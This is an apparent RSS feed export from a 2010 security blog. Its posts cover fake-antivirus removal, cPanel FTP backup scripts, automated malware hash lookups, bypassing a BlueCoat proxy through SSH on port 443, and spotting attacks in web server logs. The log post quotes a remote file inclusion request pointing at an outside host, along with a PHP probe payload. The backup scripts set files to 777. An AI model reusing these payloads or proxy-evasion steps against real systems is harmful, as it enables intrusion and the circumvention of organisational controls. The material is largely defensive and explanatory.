<p>The first thing you need to do is to extract the kit and open the avkill executable. This will stop the av.exe process that is associated with this virus. Once that is running just minimize it and let it continue to run. Then either use regedit or just double click the fix.reg file to remove the virus from your registry and to stop it from restarting. Once this is done successfully you can now stop the avkill executable. This process will stop the virus from running. Once it is stopped we suggest you go to <a href="http://www.malwarebytes.org/">http://www.malwarebytes.org/</a> and download their free scanner to remove the actual malicious files from your system.</p>
<p>If you have any questions or concerns please feel free to contact me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F03%2Fvista-antivirus-2010-quick-removal%2F&amp;title=Vista%20Antivirus%202010%20Quick%20removal" id="wpa2a_84"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/03/vista-antivirus-2010-quick-removal/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Cpanel remote FTP backup script</title>
		<link>http://www.digitaloffensive.com/2010/02/cpanel-remote-ftp-backup-script/</link>
		<comments>http://www.digitaloffensive.com/2010/02/cpanel-remote-ftp-backup-script/#comments</comments>
		<pubDate>Mon, 22 Feb 2010 15:17:09 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=117</guid>
		<description><![CDATA[Cpanel remote FTP backup script Years ago I did web hosting as a side source of income. This led to me developing  a lot of Linux based scripts to help automate my daily sysadmin responsibilities. Our hosting company was  called ezhostingpro.com. Since then another party owns the domain but googling that and my name will [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong><span style="text-decoration: underline;">Cpanel remote FTP backup script</span></strong></p>
<p style="text-align: left;">
Years ago I did web hosting as a side source of income. This led to me developing  a lot of Linux based scripts to help automate my daily sysadmin responsibilities. Our hosting company was  called ezhostingpro.com. Since then another party owns the domain but googling that and my name will lead you to several of my scripts being hosted by other sites. I posting the code on my site as I am finding many people on http://www.getafreelancer.com using codes I post on this site to bid on projects and win them.</p>
<p>This script is in two parts. The first part creates the backup and the second part transfers the backup remotely. The first part of the script makes use of the built in backup commands in cpanel. The script needs minor changes to be used by resellers instead of dedicated server owners.</p>
<p style="text-align: left;"><span style="text-decoration: underline;"><strong>Script 1:</strong></span></p>
<p>#!/bin/bash</p>
<p>############################################<br />
## ##<br />
## EZHOSTINGPRO BACKUP FTP SCRIPT v1.0 ##<br />
## Created by Michael LaSalvia ##<br />
## http://www.digitaloffensive.com ##<br />
## 2/23/04 rev 1 ##<br />
############################################<br />
## 1. Create a file called cpbackup.txt in /root<br />
## 2. Place account names you wanted backup<br />
## 3. Save file in /root<br />
############ DO NOT EDIT BELOW #############<br />
cd /root<br />
for users in $(cat cpbackup.txt)<br />
do<br />
rm -rf /home/$users/cpmove-$users.tar.gz<br />
/scripts/pkgacct $users<br />
mv /home/cpmove-$users.tar.gz /home/$users/<br />
cd /home/$users<br />
chown $users.$users cpmove-$users.tar.gz<br />
chmod 777 cpmove-$users.tar.gz<br />
/home/$users/bkftp.sh<br />
cd /root<br />
done</p>
<p style="text-align: left;"><span style="text-decoration: underline;"><strong>Script 2:</strong></span> This script needs to beedited with the users ftp credentials and placed in the user home dir.</p>
<p>#!/bin/bash</p>
<p>##################################<br />
## EZHOSTINGPRO REMOTE BACKUP ##<br />
## created by: Michael LaSalvia ##<br />
##http://www.digitaloffensive.com##<br />
## DO NOT EDIT THIS FILE ##<br />
## Name this file bkftp.sh chmod 777 ##<br />
##################################</p>
<p>### VARIABLES ###</p>
<p>var_cpaneluser=’cpanel_user_goes_here’<br />
var_remote=’remote_server_goes_here’<br />
var_ftpuser=’remote_server_ftp_username_goes_here’<br />
var_ftppass=’remote_server_ftp_password_goes_here’</p>
<p>cd /home/$var_cpaneluser<br />
ftp -n $var_remote &lt;&lt;END_SCRIPT<br />
quote USER $var_ftpuser<br />
quote PASS $var_ftppass<br />
del cpmove-$var_cpaneluser.tar.gz<br />
put cpmove-$var_cpaneluser.tar.gz<br />
quit<br />
END_SCRIPT<br />
exit 0<br />
rm -Rf cpmove-$var_cpaneluser.tar.gz</p>
<p style="text-align: left;">I believe the newer cpanel system actually provides a built in method to do this, though since I do not have access to one to test I will post this any way. If you have any questions comments or concerns please feel free to contact me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F02%2Fcpanel-remote-ftp-backup-script%2F&amp;title=Cpanel%20remote%20FTP%20backup%20script" id="wpa2a_86"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/02/cpanel-remote-ftp-backup-script/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Detecting Malware and other malicious files using md5 hashes</title>
		<link>http://www.digitaloffensive.com/2010/02/detecting-malware-and-other-malicious-files-using-md5-hashes/</link>
		<comments>http://www.digitaloffensive.com/2010/02/detecting-malware-and-other-malicious-files-using-md5-hashes/#comments</comments>
		<pubDate>Sat, 20 Feb 2010 15:57:14 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Code]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=111</guid>
		<description><![CDATA[Detecting Malware and other malicious files using md5 hashes The initial interest for this research came to me after reading an article on this on the site http://enclavesecurity.com/ . In the article they talk about using the malicious hashes to discover malware and other malicious files on their systems. They also take a deeper look [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><span style="text-decoration: underline;"><strong>Detecting Malware and other malicious files using md5 hashes</strong></span></p>
<p>The initial interest for this research came to me after reading an article on this on the site <a href="http://enclavesecurity.com/">http://enclavesecurity.com/</a> . In the article they talk about using the malicious hashes to discover malware and other malicious files on their systems. They also take a deeper look into the recent APT and Auroa attacks on Google. Though the thing I found most interesting is trying to develop a way to automate this process for free and provide usable information.</p>
<p>The biggest thing to understand before continuing on is that this is not a fool proof process as a simple change of the file will change the hash of the file. For example if you have the c99.php shell and change the password or add a white space to the php this will change the hash of the file hence making detection via this method impossible. The other issue I have noticed in using this methodology is no one is willing to share all the information. Many companies will only share bits and pieces such as “The Malware Hash Registry” (http://www.team-cymru.org) considered the leading authority on this topic. They make part of their service available online to submit hashes to and get back the following information:</p>
<p>Ex:1: 7697561ccbbdd1661c25c86762117613 1258054790 NO_DATA</p>
<p>Ex:2: cbed16069043a0bf3c92fff9a99cccdc 1231802137 69</p>
<p>In example 1 you see the md5 hash then the epoch date and time then NO_Data meaning it could not tell if this hash is malicious.  In example 2 you see the same except instead of NO_data you see 69. This number means that 69% of the Antivirus vendors they used to check this file with found it to be malicious. This info is good but I find it to be not very helpful. It is nice to know that it was detected as malicious but is it truly malicious and if it is what type of malicious file is it, is it a backdoor, key logger or so on. I have emailed them asking if they could provide the detection type; with understanding that most of their system is private as they will not disclose the database or the vendors they use to scan the files. Though I have not heard back from them at this point.</p>
<p>This led me to searching the internet for other sites like this that provided additional information along with the hash. In this search I found one other site called <a href="http://malwarehash.com/">http://malwarehash.com</a> a sub site of the company <a href="http://www.novirusthanks.org/">NoVirusThanks.org</a>. They provide an online utility to submit your hash to and if it is discovered as malicious it will give you info back. See screen shot below:</p>
<p><a href="http://www.digitaloffensive.com/wp-content/uploads/2010/02/malwarehash.jpg"><img class="alignleft size-thumbnail wp-image-112" title="malwarehash" src="http://www.digitaloffensive.com/wp-content/uploads/2010/02/malwarehash-150x150.jpg" alt="" width="150" height="150" /></a></p>
<p>As you can see they provide an additional layer over what you get from the Malware Hash Registry. On top of that they use a simple PHP script for the query that makes scripting this so much easier:</p>
<p>http://www.malwarehash.com/result.php?hash=1E71DE2D6A89AA9796344BB7FA23AC7E</p>
<p>As you can see in the URL you have the site the script and the hash. The only issue with this site is that it seems they have not updated their database since 6/2009. I have contacted them as well to ask them about this and to see what their plans are for the site though I have not heard back from them either.</p>
<p>With this information in hand I set forth to develop a script that would allow me to automate this process as we have found this methodology to be helpful at work even if it is not 100% accurate as we notice that most malware will not get detected by our Anti virus so by using the hashes and relying on the internet community we are able to help our detection and remediation of malicious files.</p>
<p>To use this script you will need to have a Linux user account and some basic knowledge of Linux to set the variables properly. I wrote the script in bash for two reasons 1 it is a piece of cake to do and 2 so you be forced to move the malicious file off a windows environment where you stand a higher chance of infecting your self.  First access your shell and create a directory called what ever you want but in the code we used a directory called infect that is set in a variable for easy changing. Once you do that copy the malware-hash.sh script to 1 directory above the folder you just created. Then copy the sed script file to a file called clean in the directory that you created. Once you have done this chmod the malware-hash.sh script so you can execute it and chmod the clean script so the malware-hash.sh script can read it. Once done all you have to do now is copy the suspicious files to the directory you created and execute the script. The script will get a listing of all the files in that folder, remove the clean script, and any dupes from the listing and then get the md5 hash of each file. Once it gets the hashes it will create a batch file to be processed against The Malware Hash Registry and save the results in a clean human readable format. We use the batch function to stay with in the TOS of the site.  This includes adding the file names in front of the hash so you know what the hash belongs to. Next it will take the hashes and run them through the site Malwarehash.com. We use the &#8211;random-wait command with wget here to not act like a bot or script. If it gets a hit for a infection we will grab the site and scrape out the data we want then process it into a human readable report. Once all done we will combine the results of both checks and email the final results to the email address provided.</p>
<p><span id="more-111"></span></p>
<p>The script is written in bash and is highly documented:</p>
<p>The script is broken down into 2 sections the actual script and the sed script file.</p>
<p><span style="text-decoration: underline;"><strong>Part 1 the Script:</strong></span> Copy this script to a file with a .sh extension or download it here <a href="http://www.digitaloffensive.com/malware-hash.sh" target="_blank">http://www.digitaloffensive.com/malware-hash.sh</a> . I suggest downloading it as the word press system will definitely destroy the formatting of the code. Place this script 1 directory up from the directory that you are using for the infected files.</p>
<p>#!/bin/bash<br />
################################################<br />
## MALWARE HASH BASH                           ##<br />
## Written by Michael LaSalvia                  ##<br />
## http://www.digitaloffensive.com              ##<br />
## Inspired by an article at enclave Security ##<br />
################################################</p>
<p>#Variables and clean up<br />
#Edit in Path to dir that contains file for analysis<br />
inPath=/home/mike/virus/infect</p>
<p>#Path to your md5sum app to verify it is not compromised. I got the hash from a new install on fedora 12.<br />
wmd5sum=/usr/bin/md5sum</p>
<p>md5sum /usr/bin/md5sum &gt; .tmp<br />
mverify=`cut -f 1 -d &#8216; &#8216; .tmp`<br />
if [$mverify == 019329f334fa7ef6116ad1a24271c8da ] then<br />
echo &#8220;Your md5 hash matches&#8221;<br />
else<br />
echo &#8221; Your md5sum hash is not right, Please verify it before continuing. Press CTRL+C now to exit&#8221;<br />
fi<br />
rm -Rf .tmp<br />
# I strongly urge you to make sure your md5 application is not compromised or the rest of this script is useless.<br />
Sleep 20</p>
<p>#Get a list of file to analyze and get their hash<br />
ls $inPath &gt; files.txt<br />
for vfiles in $(cat files.txt)<br />
do<br />
cd $inPath<br />
md5sum $vfiles &gt;&gt; hashes<br />
sort hashes | uniq &gt; $inPath/hashes.txt<br />
done<br />
#Clean up my files<br />
cat $inPath/hashes.txt | grep -v hashes &gt;&gt; .tmp; mv .tmp $inPath/hashes.txt<br />
cat $inPath/hashes.txt | grep -v md5 &gt;&gt; .tmp; mv .tmp $inPath/hashes.txt<br />
cat $inPath/hashes.txt | grep -v clean &gt;&gt; .tmp; mv .tmp $inPath/hashes.txt</p>
<p>#Format file to submit to http://www.team-cymru.org as a batch<br />
cut -f 1 -d &#8216; &#8216; $inPath/hashes.txt &gt;&gt; $inPath/md5hash.txt<br />
cut -f 3 -d &#8216; &#8216; $inPath/hashes.txt &gt;&gt; $inPath/md5name.txt<br />
echo &#8220;begin&#8221;| cat &#8211; $inPath/md5hash.txt &gt; .tmp &amp;&amp; mv .tmp $inPath/md5hash.txt<br />
echo end &gt;&gt; $inPath/md5hash.txt<br />
rm -Rf $inPath/hashes.txt</p>
<p>#Send batch request o the Malware Hash Registry (I Love netcat)<br />
nc hash.cymru.com 43 &lt; $inPath/md5hash.txt &gt; $inPath/md5results.txt</p>
<p>#Clean up response and format it<br />
cat $inPath/md5results.txt | grep -v &#8220;#&#8221; &gt;&gt; .bk; mv .bk $inPath/md5results.txt<br />
paste $inPath/md5name.txt $inPath/md5results.txt &gt; $inPath/results.txt<br />
#cat $inPath/results.txt<br />
cat $inPath/md5hash.txt | grep -v &#8220;begin&#8221; &gt;&gt; .tmp; mv .tmp $inPath/md5hash.txt<br />
cat $inPath/md5hash.txt | grep -v &#8220;end&#8221; &gt;&gt; .tmp; mv .tmp $inPath/md5hash.txt</p>
<p>#Dirty web scraper and formating (site may be out of date)<br />
for whashes in $(cat $inPath/md5hash.txt)<br />
do<br />
wget &#8211;random-wait http://www.malwarehash.com/result.php?hash=$whashes -O $whashes<br />
if grep &#8220;INFECTED&#8221; $whashes &gt; /dev/null; then<br />
cat $whashes | grep -m 1 a-squared &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 &#8220;Avira AntiVir&#8221; &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 &#8220;Avast&lt;&#8221; &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 AVG &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 BitDefender &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 ClamAV &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 Comodo &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 &#8220;Dr.Web&#8221; &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 Ewido &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 F-PROT &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 &#8220;G DATA&#8221; &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 IkarusT3 &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 Kaspersky &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 McAfee &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 &#8220;Malware Hash Registry&#8221; &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 NOD32 &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 Norman &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 Panda &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 &#8220;QuickHeal&#8221; &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 &#8220;Solo Antivirus&#8221; &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 Sophos &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 TrendMicro &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 VBA32 &gt;&gt; $inPath/.tmp<br />
cat $whashes | grep -m 1 &#8220;VirusBuster&#8221; &gt;&gt; $inPath/.tmp<br />
#More Cleaning and report creation.<br />
sed -f $inPath/clean $inPath/.tmp &gt; $inPath/.tmp1; mv $inPath/.tmp1 $inPath/$whashes<br />
rm -Rf .tmp .tmp1<br />
echo &#8220;Results from MalwareHash.com&#8221; &gt;&gt; $inPath/final_report.txt<br />
echo &#8221; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8221; &gt;&gt; $inPath/final_report.txt<br />
echo &#8220;$whashes : &#8221; &gt;&gt; $inPath/final_report.txt<br />
echo &#8221; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8221; &gt;&gt; $inPath/final_report.txt<br />
cat $inPath/$whashes &gt;&gt; $inPath/final_report.txt<br />
echo &#8221; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8221; &gt;&gt; $inPath/final_report.txt<br />
else<br />
echo &#8220;Results from MalwareHash.com&#8221; &gt;&gt; $inPath/final_report.txt<br />
echo &#8220;NO RESULTS FOUND for: $whashes&#8221; &gt;&gt; $inPath/final_report.txt<br />
echo &#8221; &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8221; &gt;&gt; $inPath/final_report.txt<br />
fi<br />
rm -Rf $inPath/$whashes<br />
rm -Rf $inPath/md5*<br />
rm -Rf $inPath/hashes<br />
done<br />
cat $inPath/results.txt | cat &#8211; $inPath/final_report.txt &gt; .tmp &amp;&amp; mv .tmp $inPath/final_report.txt<br />
echo &#8220;Results from The Malware Hash Registry&#8221; | cat &#8211; $inPath/final_report.txt &gt; .tmp &amp;&amp; mv .tmp $inPath/final_report.txt<br />
mail -s&#8221;Malware&#8221; me@me.com &lt; final_report.txt</p>
<p><strong><span style="text-decoration: underline;">Part 2 the sed script:</span></strong></p>
<p>Copy this code and put it in a file called clean located in the folder that has the files you want to analyze and chmod it so the script can read it.</p>
<p>s/&lt;tr&gt;&lt;th&gt;/AV Name:/<br />
s/&lt;tr&gt;&lt;th width=&#8221;150&#8243;&gt;/AV Name:/<br />
s/&lt;\/th&gt;&lt;td width=&#8221;83&#8243;&gt;/ Sig Version:/<br />
s/&lt;\/td&gt;&lt;td width=&#8221;100&#8243;&gt;/ Engine Version:/<br />
s/&lt;\/td&gt;&lt;td width=&#8221;116&#8243;&gt;/ Engine Version:/<br />
s/&lt;\/th&gt; &lt;td width=&#8221;83&#8243;&gt;/ Sig Version:/<br />
s/&lt;\/td&gt; &lt;td width=&#8221;116&#8243;&gt;/ Engine Version:/<br />
s/&lt;\/t&lt;td width=&#8221;213&#8243;&gt;&lt;font color=&#8221;#336600&#8243; size=&#8221;3&#8243;&gt;-/ Virus Name: Nothing Found/<br />
s/&lt;\/t&lt;td width=&#8221;213&#8243;&gt;&lt;font color=&#8221;#336600&#8243; size=&#8221;3&#8243;&gt;-/ Virus Name: Nothing Found/<br />
s/&lt;\/td&gt;&lt;td width=&#8221;213&#8243;&gt; &lt;font color=&#8221;#336600&#8243; size=&#8221;3&#8243;&gt;-/ Virus Name: Nothing Found/<br />
s/&lt;\/td&gt;&lt;td width=&#8221;213&#8243;&gt; &lt;font color=&#8221;#CC0000&#8243; size=&#8221;2&#8243;&gt;/ Virus Name: /<br />
s/&lt;\/td&gt;&lt;td width=&#8221;213&#8243;&gt;&lt;font color=&#8221;#CC0000&#8243; size=&#8221;2&#8243;&gt;/ Virus Name: /<br />
s/&lt;\/td&gt;&lt;td width=&#8221;190&#8243;&gt; &lt;font color=&#8221;#CC0000&#8243; size=&#8221;2&#8243;&gt;/ Virus Name: /<br />
s/&lt;\/td&gt; &lt;td width=&#8221;213&#8243;&gt; &lt;font color=&#8221;#336600&#8243; size=&#8221;3&#8243;&gt;-/ Virus Name: Nothing Found/<br />
s/&lt;\/td&gt; &lt;td width=&#8221;213&#8243;&gt; &lt;font color=&#8221;#CC0000&#8243; size=&#8221;2&#8243;&gt;/ Virus Name: /<br />
s/&lt;\/font&gt;&lt;\/td&gt;&lt;//<br />
s/\/tr&gt;//<br />
s/&lt;\/font&gt;&lt;\/t//<br />
s/&lt;\/font&gt; &lt;//<br />
s/&lt;\/font&gt;&lt;\/td&gt; &lt;\/tr//<br />
s/&gt; &lt;\/tr//<br />
s/d&gt;//</p>
<p>Though this methodology is a few years old there is many things that can be done with this. For example we are in the process of writing a tripwire type script that will allow web masters to monitor changes to their sites and to be able to quickly see what was added or modified as well as run it though the process above to search for infections / compromise</p>
<p>As always if you have any questions, comments or concerns please feel free to contact me.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F02%2Fdetecting-malware-and-other-malicious-files-using-md5-hashes%2F&amp;title=Detecting%20Malware%20and%20other%20malicious%20files%20using%20md5%20hashes" id="wpa2a_88"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/02/detecting-malware-and-other-malicious-files-using-md5-hashes/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>BlueCoat Web Proxy Bypass</title>
		<link>http://www.digitaloffensive.com/2010/02/bluecoat-web-proxy-bypass/</link>
		<comments>http://www.digitaloffensive.com/2010/02/bluecoat-web-proxy-bypass/#comments</comments>
		<pubDate>Mon, 08 Feb 2010 20:32:18 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=107</guid>
		<description><![CDATA[BlueCoat Web Proxy Bypass Several months ago an organization I work for implemented BlueCoat Web Proxy but they did not purchase a SSL offload card (required for organizations of our size as a license alone would bog down the rest of the box) or a SSL License. This basically limited the ability for us to [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><strong><span style="text-decoration: underline;">BlueCoat Web Proxy Bypass</span></strong></p>
<p>Several months ago an organization I work for implemented BlueCoat Web Proxy but they did not purchase a SSL offload card (required for organizations of our size as a license alone would bog down the rest of the box) or a SSL License. This basically limited the ability for us to filter anything on port 443 unless we knew the IP to set in policy to block since the page was encrypted and we could not decrypt the packet to apply policy.</p>
<p>This limitation creates a security concern because it allows users to use secure protocols to bypass policies. For example most likely your organization has a policy that blocks you from going to internet based email such as Gmail, Yahoo and so on. Well thanks to Gmail for worrying about its user’s security and privacy we can now bypass the BlueCoat Web Proxy. If we go to <a href="https://mail.google.com/">https://mail.google.com</a> the BlueCoat Web proxy will not see that as a mail site as the URL will be translated to an IP and the packets are encrypted. The other benefit of Gmail is that it will not redirect you to any http it makes sure if you choose https it will not redirect you back to http unlike Yahoo, who redirects you from https at the login to http once you get sent to your mailbox. You can use this method for any https site that does not any time redirect you to http. Side note many sites are not as big as Google so blocking their IP range to stop you from bypassing the BlueCoat web proxy may be easier.</p>
<p>The next issue is since https is required by most companies to be able to carry out a normal work day there is most likely a firewall rule in the organization that reads as follows: source: BlueCoat Web Proxy IP &#8211;&gt; destination: Any &#8211;&gt; service: http and https.  This rule basically says anyone going out as the web proxy is allowed to any destination on either port 80 or 443. Since the BlueCoat does not act as application proxy meaning it does not analyze the protocols you can use open ports to tunnel any application over. For example since the BlueCoat our organization has (most schools and smaller shops don’t have this either) does not have a SSL offload card and a SSL license and port 443 is open I can take advantage of this to bypass security. For example I have altered my SSH daemon at home to listen on port 443 instead of the default port of 22. This allows me to circumvent both the Web Proxy and the Firewall. This happens for several reasons 1<sup>st</sup> because the BlueCoat web proxy cannot analyze the https request, 2<sup>nd</sup> the BlueCoat web proxy does not act as a application proxy and third since we are using port 443 and the proxy is configured to intercept port 443 our traffic is leaving the organization as that of the proxy hence making use of the firewall rule to allow us anywhere on the internet on that port.  Many applications that connect to the internet on certain ports can be configured to use whatever port you want. For example it is possible to configure your favorite instant messenger application such as AIM or Yahoo to make connections outbound over port 443 hence bypassing the controls put in place.</p>
<p>Now if you are an administrator of the BlueCoat you can detect people doing this slightly by reviewing the BlueCoat reporter logs. These connections will show as IP addresses and have the category TCP Tunnel. If you look at the IP addresses closely you can get an idea of what they are being used for. To do this you can use tools like arin.net or even Google to search for information related to that IP.  You can also check the employee’s machine for applications that are not installed by your organization. This is a manual process and may cost more man hours then it would cost to purchase a SSL License and if need be a SSL offload card.</p>
<p>This technique may be able to be used on other proxies though I have not tested it on any. As always if you have any comments or questions please feel free to contact me.</p>
<p><strong>Edit Note:</strong> I want to thank Tim C: For the update and clarification on the card name and required license.</p>
<p><a class="a2a_dd a2a_target addtoany_share_save" href="http://www.addtoany.com/share_save#url=http%3A%2F%2Fwww.digitaloffensive.com%2F2010%2F02%2Fbluecoat-web-proxy-bypass%2F&amp;title=BlueCoat%20Web%20Proxy%20Bypass" id="wpa2a_90"><img src="http://www.digitaloffensive.com/wp-content/plugins/add-to-any/share_save_171_16.png" width="171" height="16" alt="Share"/></a></p>]]></content:encoded>
			<wfw:commentRss>http://www.digitaloffensive.com/2010/02/bluecoat-web-proxy-bypass/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Using your web server logs to find compromised web servers</title>
		<link>http://www.digitaloffensive.com/2010/01/using-your-web-server-logs-to-find-compromised-web-servers/</link>
		<comments>http://www.digitaloffensive.com/2010/01/using-your-web-server-logs-to-find-compromised-web-servers/#comments</comments>
		<pubDate>Tue, 26 Jan 2010 20:51:59 +0000</pubDate>
		<dc:creator>Michael</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.digitaloffensive.com/?p=105</guid>
		<description><![CDATA[Using your web server logs to find compromised web servers Some people use Google and Google hacking Database to find their targets and others use their own servers to find potential compromised boxes. In this quick little update I am going to give you a basic idea on how to use your web server’s access [...]]]></description>
			<content:encoded><![CDATA[<p><span style="text-decoration: underline;"><strong>Using your web server logs to find compromised web servers</strong></span></p>
<p>Some people use Google and Google hacking Database to find their targets and others use their own servers to find potential compromised boxes.</p>
<p>In this quick little update I am going to give you a basic idea on how to use your web server’s access logs to help find compromised hosts on the internet. I will be referencing Linux mostly but the same concept would be doable on a Windows IIS server as well.</p>
<p>On my webhost I am running CPanel for site management / server management. CPanel provides the ability to access the raw logs through the portal. These raw logs are almost the same as the access_logs you would find in a standard Apache setup on Linux. If you are running windows please refer to your IIS access logs and make sure they are configure to display the proper options so you can see the requested URL.</p>
<p>The logs of your web server contain a lot of useful information. It can help you diagnose site and server issues, help to see the type of traffic you are getting (ideal for SEO and marketing), help pin point possible attacks against your sites as well as slew of other bits of useful information.</p>
<p>But we are going to use this article to discuss using them to find potential compromised hosts.</p>
<p><span style="text-decoration: underline;"><strong>Let’s take a look at a sample log:</strong></span></p>
<blockquote><p>72.x.x.x &#8211; - [26/Jan/2010:04:36:31 -0600] &#8220;GET /feed/ HTTP/1.1&#8243; 304 &#8211; &#8220;-&#8221; &#8220;Feedfetcher-Google; (+http://www.google.com/feedfetcher.html; 5 subscribers; feed-id=16402550693898658203)&#8221;</p>
<p>76.12.124.76 &#8211; - [26/Jan/2010:04:40:38 -0600] &#8220;GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1&#8243; 301 &#8211; &#8220;-&#8221; &#8220;Mozilla/5.0&#8243;</p>
<p>76.12.124.76 &#8211; - [26/Jan/2010:04:40:38 -0600] &#8220;GET /?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1&#8243; 403 82481 &#8220;-&#8221; &#8220;Mozilla/5.0&#8243;</p>
<p>193.x.x.x &#8211; - [26/Jan/2010:04:53:53 -0600] &#8220;GET /robots.txt HTTP/1.1&#8243; 200 24 &#8220;-&#8221; &#8220;Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)&#8221;</p>
<p>72.x.x.x &#8211; - [26/Jan/2010:05:02:49 -0600] &#8220;GET /feed/ HTTP/1.1&#8243; 200 73246 &#8220;http://www.digitaloffensive.com/feed/&#8221; &#8220;Mozilla/5.0 (Compatible)&#8221;</p>
<p>77.x.x.x &#8211; - [26/Jan/2010:05:07:01 -0600] &#8220;GET /2009/10/c99-and-variant-php-shell-detection-quarantine-and-removal/insert_adhere_url_here HTTP/1.1&#8243; 404 10329 &#8220;-&#8221; &#8220;Yandex/1.01.001 (compatible; Win16; I)&#8221;</p>
<p>92.x.x.x &#8211; - [26/Jan/2010:05:30:12 -0600] &#8220;GET /2009/09/fun-with-poison-ivy/ HTTP/1.1&#8243; 200 18062 &#8220;http://www.google.com/search?hl=en&amp;safe=off&amp;q=poison+ivy+mutex&amp;aq=f&amp;aql=&amp;aqi=&amp;oq=&#8221; &#8220;Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 3.5.30729)&#8221;</p></blockquote>
<p>As you can see above we have several different visitor types. There are several spiders / bots that came by the site as well as several visitors from search engines such as Google. Though the two entries we want to look at closer are the entries that start with:</p>
<p>76.12.124.76 &#8211; - [26/Jan/2010:04:40:38 -0600]</p>
<p>This shows that access was attempted to the URL:</p>
<blockquote><p>/?DOCUMENT_ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt??.</p></blockquote>
<p>In this attempt the attacker was trying to use the remote file inclusion attack that I mentioned above. If I Google the SRC IP. I find that is a known malicious site used for automated scanning and distribution of malware. Though the part where it says ROOT= ROOT=http://site_blanked.com/osCommerce/catalog/images/baner.txt?? is why you guys are here.  If you visit this URL directly you will see that the attacker uploaded the following defacement code (<span style="color: #ff0000;"><strong>WARNING:</strong><span style="color: #000000;">Going to these URL&#8217;s may cause damage to your computer) </span></span>:</p>
<blockquote><p>&lt;?php /* Fx29ID */ echo(&#8220;FeeL&#8221;.&#8221;CoMz&#8221;); die(&#8220;FeeL&#8221;.&#8221;CoMz&#8221;); /* Fx29ID */ ?&gt;</p></blockquote>
<p>Basically this code would get rendered into the remote host via the remote file inclusion defacing the site to show his tag. It will then use the php command die to stop the rest of the page from loading only showing their tag.</p>
